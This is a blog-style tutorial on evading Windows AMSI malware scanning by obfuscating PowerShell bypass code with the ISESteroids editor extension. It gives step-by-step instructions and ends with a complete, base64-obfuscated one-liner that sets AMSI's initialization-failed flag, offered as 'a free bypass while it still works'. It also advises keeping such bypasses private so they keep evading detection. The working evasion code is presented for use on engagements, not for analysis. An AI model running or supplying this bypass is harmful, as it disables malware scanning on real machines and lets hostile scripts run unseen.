- AMSI Write Raid Bypass Vulnerability
- Installing ISE Steriods
- Obfuscating the payload
- Resurrecting dinosaurs with Roids
AMSI Write Raid Bypass Vulnerability
A very popular article circulated recently by Victor Khoury (Vixx) where he introduced his new AMSI bypass technique which was designed to bypass AMSI without the VirtualProtect API and without changing memory protection. You can read it in full here it’s a good read and goes into depth how this was actually found.
So that’s all well and good we have a shiny new AMSI bypass to use on engagements now right?!?.
Nope computer says that’s bad! Not surprising really as Victor reported this vulnerability to Microsoft on the 8th of April 2024. So what can we do now it’s over right? Well maybe not lets pump it full of Steroids!
Installing ISE Steriods
So what is ISE Steriods? You can find more information here. In there own words “ISESteroids is a powerful extension for the built-in ISE PowerShell editor”. But we aren’t going to use the full functionality of it. I’m just interested in their obfuscate function. I know there are other products / scripts we can use to do this I just found this one worked well with AMSI bypasses so I’ve stuck with it.
- Open PowerShell as administrator and run the below command.
Install-Module -Name "ISESteroids" -Scope CurrentUser -Repository PSGallery -Force
- If prompted click
Yes.
- Once installation has completed use the below code to start the ISE Steriods interface.
Start-Steroids
- Accept the license, you can even read it if you like.
Obfuscating the payload
OK so we have this fancy new interface.
- Copy and paste the payload from the authors github here. Into the main window. It should look something like this.
- Select
Tools→Obfuscate Code…
- Leave all options selected and click on
OK.
- OK that code now looks disgusting excellent!
- Time to test it. First we run the code below to ensure that AMSI is in fact running at the moment.
'amsiutils'
- OK so we have AMSI running. Time to try running the script. Select all
<ctrl a>then click on theRun Selectionbutton.
- Ah that’s nice it didn’t complain like the original script.
- Time to verify.
OK so no luck with that one. I have previously had a lot of success using this method so let’s see how far we can push it.
Resurrecting dinosaurs with Roids
OK so maybe you don’t believe this works so lets use an extreme case. One of the very early and well known AMSI bypasses was posted to Twitter (X) by Matt Graeber on the 24th of May 2016.
This should definitely not work any more!
- Testing the original which is rightfully blocked.
- So what if we obfuscate as we did previously? Keep an eye on the tabs at the top. Every time we obfuscate a new tab is created. OK so it looks more disgusting which is what we want.
- OK so it didn’t complain lets verify this.
Yup AMSI is dead! With a single obfuscation an AMSI bypass that is almost 8 years old still works. Full disclosure the first time I did this I had to obfuscate this AMSI bypass about 6 times before it worked so your mileage may vary. But there you have it go find your own and keep it in your back pocket and don’t share it online and you should have a bypass that lasts a decent amount of time. I have one I’ve been using for over 2 years that still works a treat.
So here it is in its entirety. Enjoy yourself a free bypass while it still works.
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)Some more proof in a different PowerShell window.
